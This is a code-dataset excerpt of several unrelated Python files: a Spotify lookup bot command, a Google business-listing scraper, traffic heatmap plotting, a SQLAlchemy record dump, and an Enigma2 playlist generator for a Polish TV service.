plt.plot(x,y,'r',label='Actual PDF')\n#plotting parameters\nplt.legend(handles=actual)\nplt.text(3.5,80000, r'$N=1000000$',fontsize='20')\nplt.show()\n\n", "sub_path": "hw3/question1.py", "file_name": "question1.py", "file_ext": "py", "file_size_in_byte": 814, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.log", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.histogram", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "359201910", "text": "from Core.OS.Keys3 import spotifyID, spotifySecret\nfrom Spotify.Albums import embedSpotifyAlbum \nfrom Spotify.Artists import embedSpotifyArtist\nfrom Spotify.Playlists import embedSpotifyPlaylist\nfrom Spotify.Podcasts import embedSpotifyShow\nfrom Spotify.Tracks import embedSpotifyTrack\nimport asyncio\nimport base64\nimport requests\nfrom Core.Fonctions.Embeds import embedAssert, exeErrorExcept\nfrom Core.Fonctions.Phrase import createPhrase\nfrom Core.Fonctions.WebRequest import webRequestHD\n\nasync def exeSpotify(ctx,bot,args,option):\n try:\n assert len(args)>0, \"Donnez moi une recherche à faire !\"\n dictOption={\"spoartiste\":\"artist\",\"spoalbum\":\"album\",\"spotitre\":\"track\",\"spopodcast\":\"show\",\"spoplaylist\":\"playlist\"}\n args=createPhrase(args)\n connect=await loginSpotify(dictOption[option], args)\n if option==\"spoartiste\":\n embedS=await embedSpotifyArtist(connect[0],connect[1])\n elif option==\"spotitre\":\n embedS=await embedSpotifyTrack(connect[0],connect[1])\n elif option==\"spoalbum\":\n embedS=await embedSpotifyAlbum(connect[0],connect[1])\n elif option==\"spopodcast\":\n embedS=await embedSpotifyShow(connect[0],connect[1])\n elif option==\"spoplaylist\":\n embedS=await embedSpotifyPlaylist(connect[0],connect[1])\n except AssertionError as er:\n embedS=embedAssert(str(er))\n except asyncio.exceptions.TimeoutError:\n await ctx.send(embed=embedAssert(\"Temps de requête écoulé, veuillez réessayer.\"))\n except:\n embedS=await exeErrorExcept(ctx,bot,args)\n await ctx.send(embed=embedS)\n return\n\nasync def loginSpotify(option, args):\n client_id = spotifyID\n client_secret = spotifySecret\n encodedData = base64.b64encode(bytes(f\"{client_id}:{client_secret}\", \"ISO-8859-1\")).decode(\"ascii\")\n access = {'Authorization': \"Basic \"+encodedData}\n data = {'grant_type': 'client_credentials'}\n response = requests.post('https://accounts.spotify.com/api/token', headers=access, data=data)\n code='Bearer '+response.json()[\"access_token\"]\n headers = {'Authorization': code, 'Content-Type': 'application/json', 'Accept': 'application/json'}\n params = (('q', args),('type', option),('market', 'FR'),('limit', '1'))\n table=await webRequestHD(\"https://api.spotify.com/v1/search\",headers,params)\n assert table[option+\"s\"][\"items\"]!=[],\"Je n'ai rien trouvé ! Vérifiez bien ce que vous cherchez.\"\n return table, code", "sub_path": "Spotify/exeSpotify.py", "file_name": "exeSpotify.py", "file_ext": "py", "file_size_in_byte": 2485, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "Core.Fonctions.Phrase.createPhrase", "line_number": 18, "usage_type": "call"}, {"api_name": "Spotify.Artists.embedSpotifyArtist", "line_number": 21, "usage_type": "call"}, {"api_name": "Spotify.Tracks.embedSpotifyTrack", "line_number": 23, "usage_type": "call"}, {"api_name": "Spotify.Albums.embedSpotifyAlbum", "line_number": 25, "usage_type": "call"}, {"api_name": "Spotify.Podcasts.embedSpotifyShow", "line_number": 27, "usage_type": "call"}, {"api_name": "Spotify.Playlists.embedSpotifyPlaylist", "line_number": 29, "usage_type": "call"}, {"api_name": "Core.Fonctions.Embeds.embedAssert", "line_number": 31, "usage_type": "call"}, {"api_name": "asyncio.exceptions", "line_number": 32, "usage_type": "attribute"}, {"api_name": "Core.Fonctions.Embeds.embedAssert", "line_number": 33, "usage_type": "call"}, {"api_name": "Core.Fonctions.Embeds.exeErrorExcept", "line_number": 35, "usage_type": "call"}, {"api_name": "Core.OS.Keys3.spotifyID", "line_number": 40, "usage_type": "name"}, {"api_name": "Core.OS.Keys3.spotifySecret", "line_number": 41, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 45, "usage_type": "call"}, {"api_name": "Core.Fonctions.WebRequest.webRequestHD", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "201854966", "text": "#!/usr/bin/python\n\nfrom PIL import Image\n\ndesired = 200\ndirections = [\n {'x':1,'y':0},\n {'x':0,'y':1},\n {'x':-1,'y':0},\n {'x':0,'y':-1},\n]\n\nout = {}\nfor q in range(100):\n img = Image.open('frame.jpg')\n\n for direction in directions:\n current = 0\n x = 300\n y = 700\n\n while current < desired:\n r,g,b = img.getpixel((x,y))\n x = x + direction['x']\n y = y + direction['y']\n\n current = (256 * 3) - r - g - b;\n\n if x < 300:\n out['right'] = x\n if x > 300:\n out['left'] = x\n if y < 700:\n out['top'] = y\n if y > 700:\n out['bottom'] = y\n \n print(out)\n\n", "sub_path": "python3/src/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 711, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "PIL.Image.open", "line_number": 15, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "52262521", "text": "from subprocess import call\nfrom datetime import datetime\nimport os\nimport pandas as pd\nfrom sty import fg, rs\nimport time\nimport csv\nimport json\nimport re\nimport sys\nimport requests\nimport shutil\n\nstart_time = time.time()\nheaders_Get = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'en-US,en;q=0.5',\n 'Accept-Encoding': 'gzip, deflate',\n 'DNT': '1',\n 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1'\n}\n\nhtml_tags = {\n 'knowledge_panel': 'kp-blk knowledge-panel',\n 'claimed': \"Own this business?\",\n 'name': \"kno-ecr-pt PZPZlf gsmt\",\n 'summary': \"kc:/local:one line summary\",\n 'stars': \"kc:/collection/knowledge_panels/local_reviewable:star_score\",\n 'comments': \"t-h6pVaOIWfNg\",\n 'web_review': \"kc:/location/location:third_party_aggregator_ratings\",\n 'phone': 'LrzXr zdqRlf kno-fv',\n # 'days': \"kc:/location/location:hours\",\n 'address': \"kc:/location/location:address\",\n 'website': \"IzNS7c duf-h\",\n 'gmap': \"rhsl4 rhsmap3col\",\n 'visiting': \"kc:/local:plan your visit\"\n}\n\nhtml_regexes = {\n 'name': '(.*)',\n 'summary': '(.*?)',\n 'stars': 'aria-label=\"(.*?)\"',\n 'comments': '(.*)',\n # 'web_review': 'aria-label=\"(.*?)\"',\n # 'web_review': 'href=\"(.*?)\"',\n 'web_review': '(.*)',\n 'phone': '(.*?)',\n 'hours': '(.*)',\n 'address': '(.*)',\n 'website': 'href=\"(.*?)\"',\n 'gmap': 'data-url=\"(.*?)\"',\n 'visiting': '(.*)'\n}\n\n# days = [\"Sunday\", \"Monday\", \"Tuesday\",\n# \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"]\n\ncsv_data = 'results.csv'\ncsv_data_true = 'results_true.csv'\ncsv_data_false = 'results_false.csv'\ngood_res = 0\nbad_res = 0\n\nEDITOR = os.environ.get('EDITOR') if os.environ.get('EDITOR') else 'vim'\n\n\ndef current_time():\n return datetime.now().strftime('%Y-%m-%d-%H-%M')\n\n\ndef google(q):\n s = requests.Session()\n q = '+'.join(q.casefold().replace(\n '&', ' and ').replace(\"'\", ' ').replace('!', '').replace('é', 'e').split())\n url = 'https://www.google.com/search?q=' + q + '&ie=utf-8&oe=utf-8'\n r = s.get(url, headers=headers_Get)\n return r.text\n\n\ndef get_string_after_tag(string, tag, regex, distance):\n if(tag not in string):\n return None\n\n index = string.find(tag)\n substr = string[index: index+distance]\n if re.search(regex, substr):\n return re.search(regex, substr).group(1)\n else:\n return None\n\n\ndef get_details(query):\n html_results = google(query)\n results = {'query': query}\n has_knowledge_panel = html_tags['knowledge_panel'] in html_results\n # print(html_results)\n\n if(has_knowledge_panel):\n results['query'] = query.replace(\n '&', ' and ').replace(\"'\", ' ').replace('!', '')\n results['exists'] = True\n\n results['name'] = get_string_after_tag(\n html_results, html_tags['name'], html_regexes['name'], 500)\n\n results['claimed'] = html_tags['claimed'] not in html_results\n\n summary = get_string_after_tag(\n html_results, html_tags['summary'], html_regexes['summary'], 600)\n if(summary):\n results['summary'] = summary\n\n stars = get_string_after_tag(\n html_results, html_tags['stars'], html_regexes['stars'], 500)\n if(stars):\n results['stars'] = stars.split(\":\")[1].split(\" sur\")[0]\n\n comments = get_string_after_tag(\n html_results, html_tags['comments'], html_regexes['comments'], 500)\n if(comments):\n results['comments'] = comments.split(\"\\xa0avis\")[0]\n\n web_review = get_string_after_tag(\n html_results, html_tags['web_review'], html_regexes['web_review'], 2500)\n if(web_review):\n web_review_all = re.findall(\n '(?:href=[\\'\"])([:/.A-z?<_&\\s=>0-9;-]+)', web_review)\n web_review_1 = web_review_all[0]\n results['web_review_1'] = web_review_1\n if len(web_review_all) > 1:\n web_review_2 = web_review_all[1]\n results['web_review_2'] = web_review_2\n\n phone_number = get_string_after_tag(\n html_results, html_tags['phone'], html_regexes['phone'], 200)\n if(phone_number):\n results['phone_number'] = phone_number\n\n address = get_string_after_tag(\n html_results, html_tags['address'], html_regexes['address'], 1000)\n if(address):\n results['address'] = address\n\n website = get_string_after_tag(\n html_results, html_tags['website'], html_regexes['website'], 200)\n if(website):\n results['website'] = website.split(\"/?\")[0]\n\n gmap = get_string_after_tag(\n html_results, html_tags['gmap'], html_regexes['gmap'], 1000)\n if(gmap):\n # results['gmap'] = gmap\n gmap_lat = re.findall(\"\\/@(-?[\\d\\.]*)\", gmap)\n gmap_lng = re.findall(\"\\/@[-?\\d\\.]*\\,([-?\\d\\.]*)\", gmap)\n results['gmap_lat'] = gmap_lat[0]\n results['gmap_lng'] = gmap_lng[0]\n\n visiting = get_string_after_tag(\n html_results, html_tags['visiting'], html_regexes['visiting'], 500)\n if(visiting):\n results['visiting'] = visiting\n\n # if html_tags['days'] in html_results:\n # hours_index = html_results.find(html_tags['days'])\n # hours_substr = html_results[hours_index: hours_index+2000]\n # for day in days:\n # results['{}_hours'.format(day)] = get_string_after_tag(\n # hours_substr, day, html_regexes['hours'], 50)\n\n else:\n results['exists'] = False\n\n return results\n\n\nif __name__ == \"__main__\":\n with open(sys.argv[1], newline='') as csvfile:\n with open(csv_data, 'w', newline='') as results:\n reader = csv.reader(csvfile)\n fieldnames = [\n 'query',\n 'exists',\n 'name',\n 'summary',\n 'phone_number',\n 'address',\n 'website',\n 'web_review_1',\n 'web_review_2',\n 'claimed',\n 'stars',\n 'comments',\n 'visiting',\n 'gmap_lat',\n 'gmap_lng',\n # \"Friday_hours\", \"Saturday_hours\", \"Sunday_hours\", \"Monday_hours\", \"Tuesday_hours\", \"Wednesday_hours\", \"Thursday_hours\"\n ]\n writer = csv.DictWriter(results, fieldnames=fieldnames)\n writer.writeheader()\n\n for row in reader:\n fetch = get_details(u\" \".join(row))\n if(fetch['exists'] == True):\n writer.writerow(fetch)\n print(fg.green, reader.line_num,\n row[0], fetch['exists'], fg.rs)\n else:\n fetch = get_details(u\" \".join(row))\n writer.writerow(fetch)\n print(fg.li_cyan, \"AGAIN!\", reader.line_num,\n row[0], fetch['exists'], fg.rs)\n if(fetch['exists'] == False):\n print(fg.red, \"... NOPE!!!\", fg.rs)\n\n # CLEAN FILES!\n with open(csv_data, 'r') as inp, open(csv_data_false, 'w') as out:\n writer = csv.writer(out)\n\n for row in csv.reader(inp):\n if row[1] != \"True\":\n writer.writerow(row)\n\n with open(csv_data, 'r') as inp, open(csv_data_true, 'w') as out:\n writer = csv.writer(out)\n\n for row in csv.reader(inp):\n if row[1] != \"False\":\n writer.writerow(row)\n\n df = pd.read_csv(csv_data_false)\n # df = df.drop(df.loc[:, 'exists':'gmap_lng'].columns, axis=1)\n df = df.drop(df.iloc[:, 1:14].columns, axis=1)\n df.to_csv(csv_data_false, header=False, index=False)\n\n # GET THE COUNT!\n print('')\n print(\" 🌈 🦄 💨\")\n print('')\n with open(csv_data_true) as f:\n total = sum(1 for line in f)\n good_res = total-1\n print(fg.li_green, \"😎 total good data: \", total-1, fg.rs)\n\n with open(csv_data_false) as f:\n total = sum(1 for line in f)\n bad_res = total\n print(fg.li_red, \"😭 total bad data: \", total, fg.rs)\n print('')\n\n\n# COPY FILES INTO TIMESTAMPS FOLDER IF NEEDED\nif(good_res > 0):\n os.mkdir(os.path.join('./', str(current_time())))\n shutil.copy(csv_data, str(current_time()))\n shutil.copy(csv_data_false, str(current_time()))\n shutil.copy(csv_data_true, str(current_time()))\n\n\n# REPORT\nmybad = (bad_res * 100)/(good_res + bad_res)\nelapsed_time = time.time() - start_time\nprint(fg.li_yellow, \"🤖 BTW! Done in: \", time.strftime(\n \"%H:%M:%S\", time.gmtime(elapsed_time)), \" with \", \"{0:.2f}\".format(round(mybad, 2)), \"% \", \"errors\", fg.rs)\n\n\ntry:\n input_ = raw_input\nexcept NameError:\n input_ = input\n\n\ndef query_yes_no(question, default=False):\n yes_list = [\"yes\", \"y\"]\n no_list = [\"no\", \"n\"]\n\n default_dict = {\n None: \"[y/n]\",\n True: \"[Y/n]\",\n False: \"[y/N]\",\n }\n\n default_str = default_dict[default]\n prompt_str = \"%s %s \" % (question, default_str)\n\n while True:\n choice = input_(prompt_str).lower()\n\n if not choice and default is not None:\n return default\n if choice in yes_list:\n return True\n if choice in no_list:\n return False\n\n notification_str = \"Please respond with 'y' or 'n'\"\n print(notification_str)\n\n\nq1 = fg.li_yellow + \" 🤖 Do you want to open \" + \\\n csv_data_false + \" inside \" + EDITOR + \" ?\" + fg.rs\nqq = fg.li_yellow + \" 🤖 Bye...\" + fg.rs\n\nprint('')\nedit_false_data = query_yes_no(q1)\nif edit_false_data == True:\n call([EDITOR, csv_data_false])\n\nelif edit_false_data == False:\n print(qq)\n quit\n", "sub_path": "gkps.py", "file_name": "gkps.py", "file_ext": "py", "file_size_in_byte": 10122, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "time.time", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 66, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 66, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 70, "usage_type": "name"}, {"api_name": "requests.Session", "line_number": 74, "usage_type": "call"}, {"api_name": "re.search", "line_number": 88, "usage_type": "call"}, {"api_name": "re.search", "line_number": 89, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 128, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 155, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 156, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 179, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 181, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 200, "usage_type": "call"}, {"api_name": "sty.fg.green", "line_number": 207, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 207, "usage_type": "name"}, {"api_name": "sty.fg.rs", "line_number": 208, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 208, "usage_type": "name"}, {"api_name": "sty.fg.li_cyan", "line_number": 212, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 212, "usage_type": "name"}, {"api_name": "sty.fg.rs", "line_number": 213, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 213, "usage_type": "name"}, {"api_name": "sty.fg.red", "line_number": 215, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 215, "usage_type": "name"}, {"api_name": "sty.fg.rs", "line_number": 215, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 219, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 221, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 226, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 228, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 232, "usage_type": "call"}, {"api_name": "sty.fg.li_green", "line_number": 244, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 244, "usage_type": "name"}, {"api_name": "sty.fg.rs", "line_number": 244, "usage_type": "attribute"}, {"api_name": "sty.fg.li_red", "line_number": 249, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 249, "usage_type": "name"}, {"api_name": "sty.fg.rs", "line_number": 249, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 255, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 255, "usage_type": "call"}, {"api_name": "os.path", "line_number": 255, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 256, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 257, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 258, "usage_type": "call"}, {"api_name": "time.time", "line_number": 263, "usage_type": "call"}, {"api_name": "sty.fg.li_yellow", "line_number": 264, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 264, "usage_type": "name"}, {"api_name": "time.strftime", "line_number": 264, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 265, "usage_type": "call"}, {"api_name": "sty.fg.rs", "line_number": 265, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 265, "usage_type": "name"}, {"api_name": "sty.fg.li_yellow", "line_number": 301, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 301, "usage_type": "name"}, {"api_name": "sty.fg.rs", "line_number": 302, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 302, "usage_type": "name"}, {"api_name": "sty.fg.li_yellow", "line_number": 303, "usage_type": "attribute"}, {"api_name": "sty.fg", "line_number": 303, "usage_type": "name"}, {"api_name": "sty.fg.rs", "line_number": 303, "usage_type": "attribute"}, {"api_name": "subprocess.call", "line_number": 308, "usage_type": "call"}]} +{"seq_id": "271286865", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport datetime\nimport time\nimport seaborn as sns\n\ndef plot_freeway_heatmap(metrics, _title, myfigy, threshold_alldays):\n index_fields = ['timeOfDay', 'Abs_PM']\n metric_names = set([a[0] for a in metrics.columns if a[0] not in index_fields])\n \n vmaxmin= {}\n for a in threshold_alldays.iteritems():\n name = \"\".join(a[0]).replace(\" \", \"\")\n vmaxmin[name] = [\n threshold_alldays[a[0]][0], \n threshold_alldays[a[0]][1]\n ]\n \n #vmaxmin[name] = [min(threshold_alldays[a[0]][0] + #3*threshold_alldays[a[0]][1], 900),\n # min(x for x in [threshold_alldays[a[0]][0] - 2*threshold_alldays[a[0]][1], \n # threshold_alldays[a[0]][0] - threshold_alldays[a[0]][1], \n # threshold_alldays[a[0]][0]*.25] \n # if x >= 0)\n # ]\n \n number_stations = len(metrics['Abs_PM'].unique())\n \n # Set up the matplotlib figure\n f, axes = plt.subplots(3, 3, figsize=(15, myfigy), sharey=True)\n f.suptitle(_title)\n sns.despine(left=True)\n sns.set(context=\"paper\", font=\"monospace\")\n \n cmap = sns.diverging_palette(h_neg=0, h_pos=260, s=99, l=10,as_cmap=True, center='light')\n \n i=0\n j=0\n for a in sorted(metric_names):\n base_metric = a.split(\"+\")[0]\n base_metric = base_metric.split(\"-\")[0][:-5]\n sns.heatmap(metrics.pivot(\"Abs_PM\", \"timeOfDay\", a), \n vmin=vmaxmin[base_metric][1], \n vmax=vmaxmin[base_metric][0],\n xticklabels=12, \n cmap=cmap,\n ax=axes[i, j],\n cbar=True,\n cbar_kws = {'orientation': 'horizontal'})\n axes[i, j].set_title(a)\n \n i += 1\n if i > 2:\n i = 0\n j += 1\n \n f.savefig('../images/'+_title+'.pdf', bbox_inches='tight')\n return threshold_alldays", "sub_path": "cohort2/trafficpassion/plot_fwy_stats.py", "file_name": "plot_fwy_stats.py", "file_ext": "py", "file_size_in_byte": 2129, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.subplots", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "seaborn.despine", "line_number": 32, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 33, "usage_type": "call"}, {"api_name": "seaborn.diverging_palette", "line_number": 35, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "59347276", "text": "# sqlalchemy connected to postgres database\r\n# Working good\r\nfrom sqlalchemy import create_engine\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy import Column, Integer, Boolean, String, Numeric, Date, MetaData, Table, DateTime\r\nimport datetime\r\n\r\nengine = create_engine(\"postgres+psycopg2://openpg:openpgpwd@localhost/postgres\")\r\nconn = engine.connect()\r\nsession = sessionmaker(bind=engine)\r\nsesh = session()\r\nBase = declarative_base()\r\nprint(sesh)\r\nprint(engine)\r\nprint(conn)\r\n\r\n\r\n# for creating table using class book\r\nclass Candidate(Base):\r\n __tablename__ = 'candidateInformation'\r\n id = Column(Integer, primary_key=True)\r\n Name = Column(String)\r\n phoneNo = Column(Numeric)\r\n Gmail = Column(String)\r\n Address= Column(String)\r\nclass CandidateDetails(Base):\r\n __tablename__ = 'candidateDetails'\r\n id = Column(Integer, primary_key=True)\r\n MotherName = Column(String)\r\n FatherName = Column(String)\r\n yearofpassing = Column(Numeric)\r\n CGPA= Column(Numeric)\r\n\r\n\r\n\r\nBase.metadata.create_all(engine) # this is must for creating table\r\n\r\n# insert data one data/hardcoded\r\n'''\r\ncandidate = Candidate(\r\n Name='rahul',\r\n phoneNo='8835739884',\r\n Gmail='rahul121@gmail.com',\r\n Address='Bank colony,near veterinary hospital,Tirupati'\r\n)\r\n\r\nsesh.add(candidate)\r\ncandidatedetails = CandidateDetails(\r\n MotherName='rani',\r\n FatherName='ankat',\r\n yearofpassing='2019',\r\n CGPA='8.8'\r\n)\r\n\r\nsesh.add(candidatedetails)\r\n\r\nsesh.commit() # necessary\r\n'''\r\n\r\n\r\n# ---------------------------------------------------------------\r\n# read data (UNLOADING)\r\nfile = open(\"sphinxtext.txt\", \"w+\")\r\nresult = sesh.query(Candidate).all()\r\nresults= sesh.query(CandidateDetails).all()\r\nprint(result)\r\nprint(results)\r\n \r\nfor re in result:\r\n file.write(\"Name={}\".format(re.Name)+ '\\n')\r\n file.write(\"phoneNo={}\".format(re.phoneNo)+ '\\n')\r\n file.write(\"Gmail={}\".format(re.Gmail)+ '\\n')\r\n file.write(\"Address={}\".format(re.Address) + '\\n')\r\n\r\n\r\n\r\nfor re in results:\r\n file.write(\"MotherName={}\".format(re.MotherName)+ '\\n')\r\n file.write(\"FatherName={}\".format(re.FatherName)+ '\\n')\r\n file.write(\"Yearofpassing={}\".format(re.yearofpassing)+ '\\n')\r\n file.write(\"CGPA={}\".format(re.CGPA) + '\\n')\r\n\r\n", "sub_path": "sphinx-textfile/sphinxunload1.py", "file_name": "sphinxunload1.py", "file_ext": "py", "file_size_in_byte": 2314, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 11, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 13, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 22, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Numeric", "line_number": 24, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 25, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 26, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 29, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 30, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 31, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Numeric", "line_number": 32, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.Numeric", "line_number": 33, "usage_type": "argument"}]} +{"seq_id": "402411745", "text": "# -*- coding: utf-8 -*-\n#\n# Based on Kodi plugin.video.pilot.wp by c0d34fun licensed under GNU GENERAL PUBLIC LICENSE. Version 2, June 1991\n# Coded by j00zek\n#\n# ADDED by j00zek\n\nimport sys\nimport os\n\nfrom wpConfig import headers\nfrom wpConfig import params #'login_url', 'main_url', 'video_url', 'close_stream_url'\nfrom wpConfig import data\nfrom wpConfig import getCookie, saveCookie\n\ndef _generate_E2bouquet():\n def doLog(txt, append = 'a' ):\n print(txt)\n open(\"/tmp/wpBouquet.log\", append).write(txt + '\\n')\n \n doLog('', 'w')\n if file_name == '':\n doLog('Ustaw nazwę pliku docelowego!')\n return\n\n #login\n StoredCookie = getCookie()\n if not StoredCookie:\n StoredCookie = _login()\n if not StoredCookie:\n doLog('Nieudane logowanie. Sprawdź login i hasło w ustawieniach wtyczki.')\n return\n\n #get channels list\n import requests\n headers.update({'Cookie': StoredCookie})\n response = requests.get(\n params['main_url'],\n verify=False,\n headers=headers,\n ).json()\n \n channelsList = response.get('data', [])\n\n #generate bouquet\n from channelsMappings import name2serviceDict, name2service4wpDict, name2nameDict\n from datetime import date\n\n doLog('Generuje bukiet dla %s ...' % frameWork)\n open(\"/tmp/wpBouquet.log\", \"a\").write('Generuje bukiet dla %s ...\\n' % frameWork)\n data = '#NAME PILOT.WP.PL aktualizacja %s\\n' % date.today().strftime(\"%d-%m-%Y\")\n for item in channelsList:\n #print item\n if item.get('access_status', '') != 'unsubscribed':\n id = item.get('id', None)\n title = item.get('name', '').strip()\n lcaseTitle = title.lower().replace(' ','')\n standardReference = '%s:0:1:0:0:0:0:0:0:0' % frameWork\n #mapowanie bezpośrednie zdefiniowane dla wp\n ServiceID = name2service4wpDict.get(title , standardReference)\n if ServiceID.startswith(standardReference):\n ServiceID = name2serviceDict.get(name2nameDict.get(lcaseTitle, lcaseTitle) , standardReference)\n #mapowanie po znalezionych kanalach w bukietach\n if ServiceID.startswith(standardReference):\n doLog(\"\\t- Brak mapowania referencji kanału %s (%s) dla EPG\" % (title, lcaseTitle))\n if not ServiceID.startswith(frameWork):\n ServiceIDlist = ServiceID.split(':')\n ServiceIDlist[0] = frameWork\n ServiceID = ':'.join(ServiceIDlist)\n data += '#SERVICE %s:%s%s%s:%s\\n' % (ServiceID, streamlinkURL, params['video_url'].replace(':','%3a') , id, title)\n data += '#DESCRIPTION %s\\n' % (title)\n\n with open(file_name, 'w') as f:\n f.write(data.encode('utf-8'))\n f.close()\n\n doLog('Wygenerowano bukiet do pliku %s' % file_name)\n f = open('/etc/enigma2/bouquets.tv','r').read()\n if not os.path.basename(file_name) in f:\n doLog('Dodano bukiet do listy')\n if not f.endswith('\\n'):\n f += '\\n'\n f += '#SERVICE 1:7:1:0:0:0:0:0:0:0:FROM BOUQUET \"%s\" ORDER BY bouquet\\n' % os.path.basename(file_name)\n open('/etc/enigma2/bouquets.tv','w').write(f)\n\ndef _login():\n def cookiesToString(cookies):\n try:\n return \"; \".join([str(x) + \"=\" + str(y) for x, y in cookies.get_dict().items()])\n except Exception as e:\n print(str(e))\n return None\n \n import requests\n \n response = requests.post(\n params['login_url'],\n json=data,\n verify=False,\n headers=headers\n )\n\n meta = response.json().get('_meta', None)\n if meta is not None:\n if meta.get('error', {}).get('name', None) is not None:\n return None\n \n saveCookie(cookiesToString(response.cookies))\n return getCookie()\n\nif __name__ == '__main__':\n if 